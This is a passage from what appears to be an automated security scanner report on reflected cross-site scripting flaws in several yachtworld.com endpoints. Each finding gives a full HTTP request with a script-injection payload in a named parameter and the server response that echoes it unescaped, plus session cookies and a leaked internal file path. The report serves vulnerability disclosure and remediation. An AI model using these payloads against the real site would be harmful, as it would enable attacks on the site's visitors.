The value of the office_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f37ed"><script>alert(1)</script>7abdd91c6ac was submitted in the office_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /starlingmarine/email.cgi?url=starlingmarine&office_id=112083f37ed"><script>alert(1)</script>7abdd91c6ac HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:37:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1



<html>
<head>
<TITLE>Starling Marine (Willmington, NC)</TITLE>
<META name="keywords" content="
...[SNIP]...
<INPUT TYPE="hidden" NAME="office_id" VALUE="112083f37ed"><script>alert(1)</script>7abdd91c6ac">
...[SNIP]...

3.524. http://www.yachtworld.com/starlingmarine/starlingmarine_1.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/starlingmarine/starlingmarine_1.cgi

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload 1bb04--><script>alert(1)</script>7103eb8b5e4 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /starlingmarine/starlingmarine_1.cgi?company=starlingmarine&limit=50&type=&new=&units=Feet&hosturl=starlingmarine1bb04--><script>alert(1)</script>7103eb8b5e4&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:41:19 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<script>alert(1)</script>7103eb8b5e4/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine1bb04-->
...[SNIP]...

3.525. http://www.yachtworld.com/starlingmarine/starlingmarine_1.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/starlingmarine/starlingmarine_1.cgi

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload dd1c2<script>alert(1)</script>40243fd836b was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /starlingmarine/starlingmarine_1.cgi?company=starlingmarine&limit=50&type=&new=&units=Feet&hosturl=starlingmarinedd1c2<script>alert(1)</script>40243fd836b&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:41:12 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarinedd1c2<script>alert(1)</script>40243fd836b/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarinedd1c2<script>
...[SNIP]...

3.526. https://www.yachtworld.com/core/cached/includes/css/stylesheet-intl.css [11.4-Build-105&locale parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/cached/includes/css/stylesheet-intl.css

Issue detail

The value of the 11.4-Build-105&locale request parameter is copied into the HTML document as plain text between tags. The payload eaf66<script>alert(1)</script>e7ce53c4373 was submitted in the 11.4-Build-105&locale parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/cached/includes/css/stylesheet-intl.css?11.4-Build-105&locale=useaf66<script>alert(1)</script>e7ce53c4373 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:57:25 GMT
Server: Apache
Cache-Control: private, max-age=31536000
Expires: Fri, 27 Jan 2012 20:57:25 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Vary: User-Agent
Connection: close
Content-Type: text/css

body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size:11px;
color:#343434;
padding-top:0;
background:#F5EADC;
margin:0;
}

/*********** FROM STYLESHEET HOME *********/
bod
...[SNIP]...
<br>/cached/includes/css/stylesheet-useaf66<script>alert(1)</script>e7ce53c4373.css<br>
...[SNIP]...

3.527. https://www.yachtworld.com/core/globalnav/emailForm.jsp [refer_page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/globalnav/emailForm.jsp

Issue detail

The value of the refer_page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 216fd"><script>alert(1)</script>e5f395519b4 was submitted in the refer_page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/globalnav/emailForm.jsp?send_to=tech&refer_page=/core/globalnav/contactUs.jsp216fd"><script>alert(1)</script>e5f395519b4 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:57:35 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<input type="hidden" name="refer_page" value="/core/globalnav/contactUs.jsp216fd"><script>alert(1)</script>e5f395519b4">
...[SNIP]...

